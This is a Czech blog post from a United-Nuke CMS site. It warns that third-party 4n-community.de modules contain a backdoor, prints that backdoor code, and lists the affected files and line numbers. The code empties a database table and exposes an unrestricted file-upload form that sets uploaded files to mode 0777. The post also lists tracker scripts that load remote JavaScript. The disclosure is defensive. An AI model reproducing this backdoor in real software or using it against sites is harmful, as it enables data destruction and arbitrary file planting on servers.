Vítejte na BLASSENweb

BLASSENweb - the future of your web !

Jste anonymní uživatel. Můžete se zdarma zaregistrovat zde

Objevte dynamické www stránky v profesionální kvalitě.
http://blassenweb.net v4.0
BLASSENweb na Facebooku
Vy ješte nespíte ?! No dobrá, jsme vám k službám !
Snadná změna vzhledu Intuitivní ovládání v češtině Mnoho doplňkových rozšíření Jednoduchá instalace Pro všechny zdarma

RYCHLÉ ODKAZY

Také hledáte rychlý, bezpečný a spolehlivý systém, který vám umožní bezstarostnou správu webu ? United-Nuke je řešení právě pro vás - stáhněte si jeho aktuální verzi a objevte stovky funkcí, které nabízí.

Nová verze:
UNITED-NUKE 4.2.08ms2 - new version
Uživatelská příručka:
UNITED-NUKE User Guide CZ v2007.1
Čeština:
Czech Language Pack for UNITED-NUKE 4.2.08ms2

NEVÍTE SI RADY...
Nevíte si rady s koupí domény ? S výběrem webhostingu ? Rádi vám poradíme. log in!

Možnosti pro Vás

Sdílet na FB
Přidat sidebar Přidat na Google Přidat na Seznam Přidat na Bloglines WAP verze RSS 0.91 RSS 0.92 RSS 2.0 Atom 0.3 Top Články Bookmark using any bookmark manager!
Mapa Stránek

Odkazy

Zajímavé odkazy

Doporučujeme vám:

Reklama

Sponzor

Sponsored by Websupport.sk webhosting
Sponsored webhosting by WebSupport.sk

Vše co se nějak vztahuje k xxNuke

Multi album a jiné moduly od 4n-community

Publikováno: 04.09, 2005
Publikoval: Blassen    Téma: Vše co se nějak vztahuje k xxNuke počet slov: 566

Předně bych chtěl říci, že se jedná o Multi-Foto Album od 4n-community.de (Album.zip) ... nikoliv o 4nAlbum od www.warp-speed.de !!
Je to velmi důležité, protože "4n" v názvu může být velmi zavádějící.

A co že je na tom modulu tak zajímavého?

Vpodstatě nic, krom toho, že do něj byl naprogramován formulář, který otvírá zadní vrátka pro takzvaný exploit, který může v horším případě zlikvidovat celou databázi.

{ Kód }:
if ($ko==1)
{
sql_query("DELETE FROM $table", $dbi);
echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' "
. "enctype='multipart/form-data' method='POST'>"
. "<br><input class=input name='datei' type='file' "
. "size='20'><input type=submit value=''></form>";
echo "$lang<br>";
echo "$user_prefix<br>";
if(@unlink($f))
{
echo " $f";
$f="0";
}
if($ok==1)
{
$dest = "modules/Album/$datei_name";
}
if(@copy($datei, $dest))
{
$dat= "modules/Album/$datei_name";
chmod ($dat, 0777);
echo "file size: $datei_size Byte";
}
}



V nadpisu článku jste si jistě všimli, že je tam "a jiné moduly".
Je to proto, protože podobný kód obsahují prakticky všechny moduly od 4n-community.de .

Povětšinou v nich lze najít takovýto kód:

{ Kód }:
if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=XXX&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>
<br><input class=input name='datei' type='file' size='30'>
<input type=submit value=''><br><br></form></center>";



Konkrétně tento jsem našel v modulu pro zasílání pohlednic "Card" (/modules.php?name=Card).

Tady je stučný přehled možných souborů s vadným kódem:
7 modulů a 7 souborů obsahujících: DELETE FROM $table" :

  1. /modules/Album/index.php (129)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  2. /modules/Card/index.php (93)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=Card&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  3. /modules/Guestbook/index.php (63)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  4. /modules/Never_Ending_Story/index.php (56)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  5. /modules/Orakel/index.php (32)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  6. /modules/serbook/index.php (192)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Userbook&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  7. /modules/WWWwishlist/index.php (124)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

Další jsou nalezené trackery, které by tam také neměli být:

  1. /modules/Album/picture.php (58)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  2. /modules/Album/picture1.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  3. /modules/Album/template.htm (30)
    <param name="ShowTracker" value="0">


  4. /modules/Album/template1.htm (33)
    <param name="ShowTracker" value="0">


  5. /modules/Album/vorschau.htm (53)
    <param name="ShowTracker" value="0">


  6. /modules/Album/vorschau1.htm (57)
    <param name="ShowTracker" value="0">


  7. /modules/Card/start.php (4)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  8. /modules/Card/start.php (214)
    document.write('<script src="<? echo "$view"; ?>/tracker/referer.php?referer='+s_referer+'"></script>');


  9. /modules/Card/template.htm (31)
    <param name="ShowTracker" value="0">


  10. /modules/Card/vorschau.htm (50)
    <param name="ShowTracker" value="0">


  11. /modules/Guestbook/index.php (105)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  12. /modules/Never_Ending_Story/index.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  13. /modules/Orakel/orakel.php (17)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  14. /modules/Userbook/picture.php (59)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  15. /modules/Userbook/picture1.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


Poznámka: čísla v závorce jsou čísla řádků..




Autor: Blassen




Sdílet na FB


Bookmark using any bookmark manager!
Publikoval: Blassen

Možnosti
 Vytisknout článek Vytisknout článek
 PDF PDF
"Multi album a jiné moduly od 4n-community" | Přihlásit/Registrovat | 0 komentářů
BLASSENweb jako provozovatel blassenweb.net a přidružených subdomén, nezodpovídá za obsah komentářů. Provozovatel služby si vyhrazuje právo zasahovat do diskuze v případě používání vulgarizmů, osočování a též vždy, když je obsah příspěvku spůsobilý naplnit skutkovou podstatu trestného činu nebo zasahuje do práva na ochranu osobnosti třetích osob. Ve vyjímečném případě může přistoupit k smazání příspěvků nebo zablokování přístupu i těm, kteří přímo neporušují kodex, ale jejich působení je dlouhodobě překážkou slušné a věcné diskuze a obtěžuje ostatní diskutující. Přispíváním komentářů vyjadřujete svůj souhlas s těmito pravidly a zavazujete se je dodržovat. Přidáním příspěvku souhlasíte s možným dalším uveřejněním na blassenweb.net bez nároku na finanční odměnu.

Není povoleno posílat komentáře anonymně, prosím zaregistrujte se.

Odklepnuto.cz,internetová aukce,aukce,online-prodej,dražba,prodávat,nakupovat reklama
Mapa Stránek Page Rank Hjosef.net&redakční systémy webmaster tools, Hry, UNITED/PHP Nuke a jiné zajímavosti xml - rss - rdf Validate this feed at feedvalidator.org Seo servis
Stále nemáte svou prezentaci na internetu? A víte, že je to jako byste vůbec neexistovali? Lidé jsou stále více líní a pokud na internetu nenaleznou co hledají (a nejlépe na předních místech vyhledávačů), raději osloví konkurenci, která již webovou prezentaci vlastní. Už jen z toho důvodu, že během pár vteřin naleznou přehled produktů, ceník, kontakt a další pro ně důležité údaje. A přitom je to jedna z nejlevnějších a nejúčinnějších reklam. Zákazníkům dává o důvod víc, proč zvolit zrovna Vás.
Tato prezentace využívá systém pro správu obsahu united-nuke.
Čas potřebný ke zpracování stránky: 0.09 sekund
Vaše šťastné číslo: 110
Přidej vlastní deníčekPřidej vlastní deníček
Dnes je : 21. 05, 2012
Domů >téma> Vše co se nějak vztahuje k xxNuke > Multi album a jiné moduly od 4n-community
| pomoc | kontakt | reklama | volná místa | pravidla | BLASSENweb na Facebooku | email | Copyright © 2004 - 2012 by BLASSENweb
Veškeré ukázky zdrojových kódu můžete používat bez omezení. Text těchto stránek však nesmíte kopírovat bez souhlasu autora.
Autor nenese žádnou zodpovědnost za případné škody způsobené v souvislosti s obsahem tohoto webu.
Magic SEO URL - Optimalizace pro vyhledávače